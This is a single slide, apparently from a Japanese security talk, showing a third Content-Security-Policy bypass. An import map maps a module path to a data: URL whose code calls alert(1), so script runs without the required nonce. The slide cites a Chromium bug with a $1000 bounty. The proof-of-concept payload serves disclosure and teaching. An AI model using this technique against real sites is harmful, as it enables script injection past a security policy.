Slide 36
Slide 36 text
CSPのバイパス3
Content-Security-Policy: script-src: ‘nonce-random’;
{ "imports": {
"/path/to/kv-storage-polyfill.mjs": [
"data:application/javascript,const storage=()=>{}; storage.set=(a,b)=>{alert(1)};
export {storage};"
]
}}
import {storage} from '/path/to/kv-storage-polyfill.mjs';
storage.set('test', '1'); // alert(1)
Nonceを指定しなくてもマップを作れてしまう
https://crbug.com/941340: $1000
アイディアが浮かんだ方はみんな正解!